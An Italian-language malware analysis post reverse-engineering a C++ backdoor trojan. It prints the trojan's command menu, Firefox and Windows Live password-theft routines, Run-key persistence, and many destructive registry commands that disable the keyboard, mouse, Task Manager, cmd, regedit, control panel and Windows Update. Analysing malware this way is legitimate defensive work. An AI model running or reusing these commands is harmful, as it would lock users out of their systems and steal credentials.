t3c4i3's shell trojan -- Reversed































Ciao a tutti,
in questi giorni mi sono smazzata tra ida pro per debian/gnulinux -- ollydebug su wine una marea di manuali di unpacking e 5 gb di virus... alla fine ho comuqnue preferito scrivere di nuovi trojan usciti da poco.

Bene questo viene trovato solo da
[file and pathname of the sample #1] 69,704 bytes MD5: 0xB9DF7508F42E7283F5E3A4FFB96B9B9C
SHA-1: 0x979385C4690F8F77A619CEB1A547F5817E19A919		 Backdoor.Win32.Agent.alke [Kaspersky Lab]

si kaspersky è uscito da poco ed è abbastanza interessante magari non è hai livelli di Zeus (tra un pò arriverò anche ad analizzare in dettaglio quello ho gia cominciato qualcosa) ma è pur sempre fatto bene e molto old school.
è fatto in c++ il che è una rarità per molti nuovi virus che sono sempre più sviluppati con Delphi.
il programma usa queste funzioni:
Program:

GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
1#QNAN
1#INF
1#IND
1#SNAN
GetCurrentDirectoryA
GetEnvironmentVariableA
DeleteFileA
CreateThread
Sleep
GetTempPathA
GetSystemDirectoryA
GetComputerNameA
GetModuleFileNameA
GlobalFree
CloseHandle
WriteFile
CreateFileA
GlobalAlloc
LocalAlloc
SetFileAttributesA
GetWindowsDirectoryA
ReadFile
SetFilePointer
GetVersionExA
SetCurrentDirectoryA
GetFileAttributesA
LoadLibraryA
GetProcAddress
FreeLibrary
GetCurrentProcess
GetTickCount
KERNEL32.dll
FindWindowA
USER32.dll
BitBlt
SelectObject
CreateCompatibleBitmap
GetDeviceCaps
CreateCompatibleDC
CreateDCA
GetDIBits
GetObjectA
GDI32.dll
GetUserNameA
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
RegSetValueExA
RegOpenKeyA
OpenProcessToken
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
InternetOpenUrlA
InternetCloseHandle
InternetOpenA
WININET.dll
WS2_32.dll
GetLastError
SetEnvironmentVariableA
HeapFree
HeapAlloc
GetTimeZoneInformation
GetSystemTime
GetLocalTime
MoveFileA
ExitProcess
TerminateProcess
GetModuleHandleA
GetStartupInfoA
GetCommandLineA
GetVersion
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
HeapReAlloc
GetCPInfo
GetACP
GetOEMCP
WideCharToMultiByte
SetHandleCount
GetStdHandle
GetFileType
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
RtlUnwind
MultiByteToWideChar
GetStringTypeA
GetStringTypeW
LCMapStringA
LCMapStringW
SetStdHandle
FlushFileBuffers
SetEndOfFile
CompareStringA
CompareStringW


Fa una lista delle directory e ritorna le funzioni utilizzabili.
Ad esempio può fare casino nel computer vittima (prank) o mostrare le informazioni dello schermo "display/information" e desktop (che manda una jpg con la schermata della vittima)
Fornisce una shell di dos
Cerca le password salvandole in un file e mandandole all attaccante
Ha una funzione di keylog (utilizzabile solo nella versione privata hihi)
Clear per cancellare i log
Download per scaricare file dal computer e upload per caricarli
Driver query per la lista dei driver
e questi ultimi che si spiegano da soli
ipconfig
path
tasklist
start
mkdir
taskkill
shutdown
attrib
rename
assoc
chdir
title
color

Chiede la versione del sistema su cui sta il server remoto

@.q0o2nc
}c9c$F&+O$`"
_ERROR_1_
::System Information
OS - Windows XP
OS - Windows Vista

Scarica i keylog nel file \TFR336F.tmp

fa un bypass al Windows Security Alert
DFAFD.bat
\cmd.exe
Windows Security Alert
/c taskkill /im rundll32.exe /f
open
taskkill /im rundll32.exe /f
open


usa varie dll e funzioni
mozcrt19.dll
nspr4.dll
plds4.dll
plc4.dll
nssutil3.dll
sqlite3.dll
nspr4.dll
plds4.dll
plc4.dll
plc4.dll
softokn3.dll
nss3.dll
nss3.dll
plc4.dll
NSS_Init
NSS_Shutdown
PK11_GetInternalKeySlot
PK11_FreeSlot
PK11_Authenticate
PK11SDR_Decrypt
PK11_CheckUserPassword
PL_Base64Decode


cerca di scaricare password da firefox e windows live
--------------------------------------------------------------------------------
Application Type - FireFox
Signon: %s
::--Unmanaged Urls
::--Managed Urls
URL: %s
%s : %s
End of Signon: %s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Application Data\Mozilla\Firefox
userprofile
\Application Data\Mozilla\Firefox
\profiles.ini
\AppData\Roaming\Mozilla\Firefox
\profiles.ini
name=default
path=
SOFTWARE\Mozilla\Mozilla Firefox
CurrentVersion
signons.txt
signons2.txt
signons3.txt
End of FireFox
advapi32.dll
CredEnumerateA
CredFree
WindowsLive:name=*
\TFR336F.tmp
--------------------------------------------------------------------------------
Application Type - Windows Live Messenger version 8.x/9.x:
Username: %s
Password: %ws
End Of Windows Live Messenger
\TFR336F.tmp
_ERROR_1_
_ERROR_2_
_ERROR_3_
\TFR336F.exe
\TFR336F.bat
_ERROR_1_
_ERROR_2_
_ERROR_1_
_ERROR_2_

C'è una signature

----------Signature----------

Armadillo v1.71

Quindi l hanno criptato con armadillo

facendo vari unpacking e vari dump sono riuscita a decryptare l ip della connessione e l id che avevo messo

00011000 : 31 32 37 2E 30 2E 30 2E 31 00 00 00 00 00 00 00 127.0.0.1.......
00011010 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00011020 : C0 07 00 00 61 73 64 65 72 00 00 00 00 00 00 00 À..ASDER.......

visto che la connessione l avevo messa io puntava in locale ;)





00401015 PUSH t3c4i3's.00410034 Custom commands\n\n
00401022 PUSH t3c4i3's.00410048 1 - download "filename"\n
0040102F PUSH t3c4i3's.00410064 2 - upload [/server | /url] "filename" "url"\n
0040103C PUSH t3c4i3's.00410094 3 - keylog [/on] [/off] [/get] [/clear]\n
00401049 PUSH t3c4i3's.004100C0 4 - click "website" count\n
00401056 PUSH t3c4i3's.004100DC 5 - password [/get]\n
00401063 PUSH t3c4i3's.004100F4 6 - dos "ip" port [/tcp] sockets packets\n
00401070 PUSH t3c4i3's.00410120 7 - display [/desktop | /information]\n
0040107D PUSH t3c4i3's.00410148 8 - del "filename" (modified)\n
0040108A PUSH t3c4i3's.00410168 9 - prank [/list | number]\n\n
00401097 PUSH t3c4i3's.00410188 Normal Shell commands\n\n
004010A4 PUSH t3c4i3's.004101A4 Start, Exit, Cls, Help, Dir, Ipconfig\n
004010B1 PUSH t3c4i3's.004101CC Tasklist, Taskkill, Md, Mkdir, Rmdir, Shutdown\n
004010BE PUSH t3c4i3's.00410200 Attrib, Ren, Rename, Assoc\n
004010CB PUSH t3c4i3's.00410220 ... Etc.\n\n
004010D8 PUSH t3c4i3's.0041022C Keylog function has been locked from public version.\n\n
004010E5 PUSH t3c4i3's.00410264 keylog

questa è una funzione che può venire usata per guadagnare dai banner

00401D74 PUSH t3c4i3's.00410AB0 CLICK\t\tClicks a website invisibly\n








004044ED PUSH t3c4i3's.00412550 echo Windows Registry Editor Version 5.00>"nokeyboard.reg"\n
004044FE PUSH t3c4i3's.0041258C echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout]>>nokeyboard.reg\n
0040450F PUSH t3c4i3's.004125E4 echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\>>nokeyboard.reg\n
00404520 PUSH t3c4i3's.00412644 echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\>>nokeyboard.reg\n
00404531 PUSH t3c4i3's.004126A8 echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\>>nokeyboard.reg\n
00404542 PUSH t3c4i3's.0041270C echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\>>nokeyboard.reg\n
00404553 PUSH t3c4i3's.00412770 echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\>>nokeyboard.reg\n
00404564 PUSH t3c4i3's.004127D4 echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\>>nokeyboard.reg\n
00404575 PUSH t3c4i3's.00412838 echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\>>nokeyboard.reg\n
00404586 PUSH t3c4i3's.0041289C echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\>>nokeyboard.reg\n
00404597 PUSH t3c4i3's.00412900 echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\>>nokeyboard.reg\n
004045A8 PUSH t3c4i3's.00412964 echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\>>nokeyboard.reg\n
004045B9 PUSH t3c4i3's.004129C8 echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\>>nokeyboard.reg\n
004045CA PUSH t3c4i3's.00412A2C echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\>>nokeyboard.reg\n
004045DB PUSH t3c4i3's.00412A90 echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\>>nokeyboard.reg\n
004045EC PUSH t3c4i3's.00412AF4 echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\>>nokeyboard.reg\n
004045FD PUSH t3c4i3's.00412B58 echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\>>nokeyboard.reg\n
0040460E PUSH t3c4i3's.00412BBC echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\>>nokeyboard.reg\n
0040461F PUSH t3c4i3's.00412C20 echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\>>nokeyboard.reg\n
00404630 PUSH t3c4i3's.00412C84 echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\>>nokeyboard.reg\n
00404641 PUSH t3c4i3's.00412CE8 echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\>>nokeyboard.reg\n
00404652 PUSH t3c4i3's.00412D4C echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\>>nokeyboard.reg\n
00404663 PUSH t3c4i3's.00412DB0 echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00>>nokeyboard.reg\n
00404674 PUSH t3c4i3's.00412DF8 start /min nokeyboard.reg\n
00404685 PUSH t3c4i3's.00412E14 ping 127.0.0.1 /w 3000>nul\n

parte che usa per fare keylogging


004046AC PUSH t3c4i3's.00412E48 reg add HKLM\System\CurrentControlSet\Services\MouClass /v Start /t reg_dword /d 4 /f\n

Abilita l ultilizzo dei driver del mouse di sistema

004046C2 PUSH t3c4i3's.00412EA0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t reg_dword /d 1 /f\n

Cerca di disabilitare il task manager

004046D8 PUSH t3c4i3's.00412F10 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t reg_dword /d 1 /f\n

Anche il Regedit

004046EE PUSH t3c4i3's.00412F88 reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t reg_dword /d 1 /f\n

Disabilita il promt comandi

Impedisce il funzionamento a tutti questi file
00404704 PUSH t3c4i3's.00412FE4 reg add "HKCU\control panel\don't load" /v access.cpl /d no /f\n
00404715 PUSH t3c4i3's.00413024 reg add "HKCU\control panel\don't load" /v appwiz.cpl /d no /f\n
00404726 PUSH t3c4i3's.00413064 reg add "HKCU\control panel\don't load" /v console.cpl /d no /f\n
00404737 PUSH t3c4i3's.004130A8 reg add "HKCU\control panel\don't load" /v timedate.cpl /d no /f\n
00404748 PUSH t3c4i3's.004130EC reg add "HKCU\control panel\don't load" /v desk.cpl /d no /f\n
00404759 PUSH t3c4i3's.0041312C reg add "HKCU\control panel\don't load" /v fax.cpl /d no /f\n
0040476A PUSH t3c4i3's.0041316C reg add "HKCU\control panel\don't load" /v hdwwiz.cpl /d no /f\n
0040477B PUSH t3c4i3's.004131AC reg add "HKCU\control panel\don't load" /v irprops.cpl /d no /f\n
0040478C PUSH t3c4i3's.004131F0 reg add "HKCU\control panel\don't load" /v intl.cpl /d no /f\n
0040479D PUSH t3c4i3's.00413230 reg add "HKCU\control panel\don't load" /v inetcpl.cpl /d no /f\n
004047AE PUSH t3c4i3's.00413274 reg add "HKCU\control panel\don't load" /v joy.cpl /d no /f\n
004047BF PUSH t3c4i3's.004132B4 reg add "HKCU\control panel\don't load" /v liccpa.cpl /d no /f\n
004047D0 PUSH t3c4i3's.004132F4 reg add "HKCU\control panel\don't load" /v main.cpl /d no /f\n
004047E1 PUSH t3c4i3's.00413334 reg add "HKCU\control panel\don't load" /v mlcfg32.cpl /d no /f\n
004047F2 PUSH t3c4i3's.00413378 reg add "HKCU\control panel\don't load" /v mmsys.cpl /d no /f\n
00404803 PUSH t3c4i3's.004133B8 reg add "HKCU\control panel\don't load" /v ncpa.cpll /d no /f\n
00404814 PUSH t3c4i3's.004133F8 reg add "HKCU\control panel\don't load" /v modem.cpl /d no /f\n
00404825 PUSH t3c4i3's.00413438 reg add "HKCU\control panel\don't load" /v netcpl.cpl /d no /f\n
00404836 PUSH t3c4i3's.00413478 reg add "HKCU\control panel\don't load" /v nwc.cpl /d no /f\n
00404847 PUSH t3c4i3's.004134B8 reg add "HKCU\control panel\don't load" /v odbccp32.cpl /d no /f\n
00404858 PUSH t3c4i3's.004134FC reg add "HKCU\control panel\don't load" /v devapps.cpl /d no /f\n
00404869 PUSH t3c4i3's.00413540 reg add "HKCU\control panel\don't load" /v ports.cpl /d no /f\n
0040487A PUSH t3c4i3's.00413580 reg add "HKCU\control panel\don't load" /v powercfg.cpl /d no /f\n
0040488B PUSH t3c4i3's.004135C4 reg add "HKCU\control panel\don't load" /v sticpl.cpl /d no /f\n
0040489C PUSH t3c4i3's.00413604 reg add "HKCU\control panel\don't load" /v srvmgr.cpl /d no /f\n
004048AD PUSH t3c4i3's.00413644 reg add "HKCU\control panel\don't load" /v sapi.cpl /d no /f\n
004048BE PUSH t3c4i3's.00413684 reg add "HKCU\control panel\don't load" /v sysdm.cpl /d no /f\n
004048CF PUSH t3c4i3's.004136C4 reg add "HKCU\control panel\don't load" /v telephon.cpl /d no /f\n
004048E0 PUSH t3c4i3's.00413708 reg add "HKCU\control panel\don't load" /v tweakui.cpl /d no /f\n
004048F1 PUSH t3c4i3's.0041374C reg add "HKCU\control panel\don't load" /v nusrmgr.cpl /d no /f\n
00404902 PUSH t3c4i3's.00413790 reg add "HKCU\control panel\don't load" /v wspcpl32.cpl /d no /f\n
00404913 PUSH t3c4i3's.004137D4 reg add "HKCU\control panel\don't load" /v quicktime.cpl /d no /f\n
00404924 PUSH t3c4i3's.00413818 reg add "HKCU\control panel\don't load" /v S32LUCP1.cpl /d no /f\n
00404935 PUSH t3c4i3's.0041385C reg add "HKCU\control panel\don't load" /v cpqmgmt.cpl /d no /f\n

Disabilita anche gran parte delle funzioni di explorer e windows update
0040494B PUSH t3c4i3's.004138A0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDeletePrinter /t reg_dword /d 1 /f\n
0040495C PUSH t3c4i3's.00413914 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoAddPrinter /t reg_dword /d 1 /f\n
0040496D PUSH t3c4i3's.00413984 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t reg_dword /d 1 /f\n
0040497E PUSH t3c4i3's.004139F0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t reg_dword /d 1 /f\n
0040498F PUSH t3c4i3's.00413A5C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t reg_dword /d 1 /f\n
004049A0 PUSH t3c4i3's.00413AC4 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetFolders /t reg_dword /d 1 /f\n
004049B1 PUSH t3c4i3's.00413B34 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskbar /t reg_dword /d 1 /f\n
004049C2 PUSH t3c4i3's.00413BA4 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t reg_dword /d 1 /f\n
004049D3 PUSH t3c4i3's.00413C10 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t reg_dword /d 3FFFFFF /f\n
004049E4 PUSH t3c4i3's.00413C84 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t reg_dword /d 1 /f\n
004049F5 PUSH t3c4i3's.00413CF0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSaveSettings /t reg_dword /d 1 /f\n
00404A06 PUSH t3c4i3's.00413D64 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableRegistryTools /t reg_dword /d 1 /f\n
00404A17 PUSH t3c4i3's.00413DDC reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t reg_dword /d 1 /f\n
00404A28 PUSH t3c4i3's.00413E50 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsHistory /t reg_dword /d 1 /f\n
00404A39 PUSH t3c4i3's.00413EC8 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFileMenu /t reg_dword /d 1 /f\n
00404A4A PUSH t3c4i3's.00413F38 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoActiveDesktop /t reg_dword /d 1 /f\n
00404A5B PUSH t3c4i3's.00413FAC reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoActiveDesktopChanges /t reg_dword /d 1 /f\n
00404A6C PUSH t3c4i3's.00414028 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoInternetIcon /t reg_dword /d 1 /f\n
00404A7D PUSH t3c4i3's.0041409C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFavouritesMenu /t reg_dword /d 1 /f\n
00404A8E PUSH t3c4i3's.00414110 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoChangeStartMenu /t reg_dword /d 1 /f\n
00404A9F PUSH t3c4i3's.00414184 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t reg_dword /d 1 /f\n
00404AB0 PUSH t3c4i3's.004141F8 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClearRecentDocsOnExit /t reg_dword /d 1 /f\n
00404AC1 PUSH t3c4i3's.00414270 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t reg_dword /d 1 /f\n
00404AD2 PUSH t3c4i3's.004142DC reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t reg_dword /d 1 /f\n
00404AE3 PUSH t3c4i3's.00414350 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuSubFolders /t reg_dword /d 1 /f\n
00404AF4 PUSH t3c4i3's.004143C8 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindowsUpdate /t reg_dword /d 1 /f\n
00404B05 PUSH t3c4i3's.0041443C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t reg_dword /d 1 /f\n
00404B16 PUSH t3c4i3's.004144B0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveAutoRun /t reg_dword /d 1 /f\n
00404B27 PUSH t3c4i3's.00414524 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartBanner /t reg_dword /d 1 /f\n
00404B38 PUSH t3c4i3's.00414594 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetActiveDesktop /t reg_dword /d 1 /f\n
00404B49 PUSH t3c4i3's.0041460C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetConnectDisconnect /t reg_dword /d 1 /f\n
00404B5A PUSH t3c4i3's.00414688 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t reg_dword /d 1 /f\n
00404B6B PUSH t3c4i3's.004146F4 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispBackgroundPage /t reg_dword /d 1 /f\n
00404B7C PUSH t3c4i3's.0041476C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispScrSavPage /t reg_dword /d 1 /f\n
00404B8D PUSH t3c4i3's.004147E0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispAppearancePage /t reg_dword /d 1 /f\n
00404B9E PUSH t3c4i3's.00414858 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispSettingPage /t reg_dword /d 1 /f\n
00404BAF PUSH t3c4i3's.004148CC reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoSecCPL /t reg_dword /d 1 /f\n
00404BC0 PUSH t3c4i3's.00414938 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoPwdPage /t reg_dword /d 1 /f\n
00404BD1 PUSH t3c4i3's.004149A4 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoAdminPage /t reg_dword /d 1 /f\n
00404BE2 PUSH t3c4i3's.00414A10 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoProfilePage /t reg_dword /d 1 /f\n
00404BF3 PUSH t3c4i3's.00414A80 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDevMgrPage /t reg_dword /d 1 /f\n
00404C04 PUSH t3c4i3's.00414AF0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoConfigPage /t reg_dword /d 1 /f\n
00404C15 PUSH t3c4i3's.00414B60 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoFileSysPage /t reg_dword /d 1 /f\n
00404C26 PUSH t3c4i3's.00414BD0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoVirtMemPage /t reg_dword /d 1 /f\n
00404C37 PUSH t3c4i3's.00414C40 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t reg_dword /d 1 /f\n
00404C48 PUSH t3c4i3's.00414CB0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t reg_dword /d 1 /f\n
00404C59 PUSH t3c4i3's.00414D28 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t reg_dword /d 1 /f\n
00404C6A PUSH t3c4i3's.00414DA0 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t reg_dword /d 1 /f\n
00404C7B PUSH t3c4i3's.00414E18 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network /v NoNetSetup /t reg_dword /d 1 /f\n
00404C8C PUSH t3c4i3's.00414E84 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network /v NoNetSetupIDPage /t reg_dword /d 1 /f\n
00404C9D PUSH t3c4i3's.00414EF8 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network /v NoNetSetupSecurityPage /t reg_dword /d 1 /f\n
00404CAE PUSH t3c4i3's.00414F70 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network /v NoFileSharingControl /t reg_dword /d 1 /f\n
00404CBF PUSH t3c4i3's.00414FE8 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network /v NoPrintSharing /t reg_dword /d 1 /f\n
00404CD0 PUSH t3c4i3's.00415058 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp /v Disabled /t reg_dword /d 1 /f\n
00404CE1 PUSH t3c4i3's.004150C4 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp /v NoRealMode /t reg_dword /d 1 /f\n

Può anche cancellare questi file di registro
00404CF7 PUSH t3c4i3's.00415134 reg delete HKCR\Directory\Shell\Find /f\n
00404D08 PUSH t3c4i3's.00415160 reg delete HKCR\Folder\Shell\Explore /f\n
00404D19 PUSH t3c4i3's.0041518C reg delete HKCR\Folder\Shell\Open /f\n

Queste sono opzioni personalizzate non è detto che siano tutte attive nel server

00404E2D PUSH t3c4i3's.0041520C Prank Upload
00404EE3 PUSH t3c4i3's.0041521C 7 . Closing Applications\n
00404EF0 PUSH t3c4i3's.00415238 - closes Msnmsgr.exe, Explorer.exe, Iexplore.exe, Wmplayer.exe\n\n
00404EFD PUSH t3c4i3's.00415280 8 . Open CD Tray\n
00404F0A PUSH t3c4i3's.00415294 - works only for certain pc\n\n
00404F17 PUSH t3c4i3's.004152B8 10 . Shutdown Started\n
00404F24 PUSH t3c4i3's.004152D0 - shutdown pc immediately\n
00404F31 PUSH t3c4i3's.004152F4 41 . Disable Keyboard\n
00404F3E PUSH t3c4i3's.0041530C - uses registry to remove keyboard\n\n
00404F4B PUSH t3c4i3's.00415338 42 . Disable Mouse\n
00404F58 PUSH t3c4i3's.00415350 - uses registry to remove mouse\n\n
00404F65 PUSH t3c4i3's.00415378 43 . Disable Task Manager\n
00404F72 PUSH t3c4i3's.00415394 - uses registry to block task manager\n
00404F7F PUSH t3c4i3's.004153C4 44 . Disable Registry Editor\n
00404F8C PUSH t3c4i3's.004153E4 - uses registry to block registry[lol]\n\n
00404F99 PUSH t3c4i3's.00415414 45 . Disable Command Prompt\n
00404FA6 PUSH t3c4i3's.00415434 - uses registry to block command prompt\n
00404FB3 PUSH t3c4i3's.00415464 46 . Hide Control Panel Applets\n
00404FC0 PUSH t3c4i3's.00415488 - uses registry\n\n
00404FCD PUSH t3c4i3's.004154A0 47 . Restrict Features\n
00404FDA PUSH t3c4i3's.004154BC - uses registry\n
00404FE7 PUSH t3c4i3's.004154D4 - includes Code 44.\n
00404FF4 PUSH t3c4i3's.004154F0 - includes Code 45.\n\n
00405001 PUSH t3c4i3's.0041550C 48 . Delete Open, Explore & Find\n
0040500E PUSH t3c4i3's.00415530 - uses registry\n\n
0040501B PUSH t3c4i3's.00415548 71 . Consume Harddisk\n
00405028 PUSH t3c4i3's.00415560 - eats up all the space in the default harddisk\n\n
00405035 PUSH t3c4i3's.00415598 \n


Questo Trojan anche se sembra molto old style ha funzioni innovative come l'utilizzo dei bot in massa e la reverse connection.
Tanto tempo fa quando ancora non si usavano tanto i router c'era l idea di mandare una lista di server disponibili su un sito in php o mandando un segnale alla tua macchina e apparendo su una finistrella del client dopo aver avuto la lista dei server disponibili bisognava connettersi a essi e alcuni dopo un pò cominciavano a dare problemi sopratutto se erano messi dietro a un router...
Per questo ora si usa la reverse connection il client non si connette più al server ma il server che si connette al client e attravverso a esso si possono mandare svariati comandi.

Per esempio questo trojan manda un pacchetto dalla porta 1984 (impostata sempre da me)

00000000 | 434F 4D50 5554 4552 4E41 4D45 | COMPUTERNAME

cercando di connettersi a un client...

Apre anche una porta per spedire immagini e/o file la 1033 (questa impostata di default)

crea una voce di registro in
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
inserendo la locazione del trojan nel vostro pc per auto avviarsi ogni volta che accendete il computer

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion]
Text = "1254680584"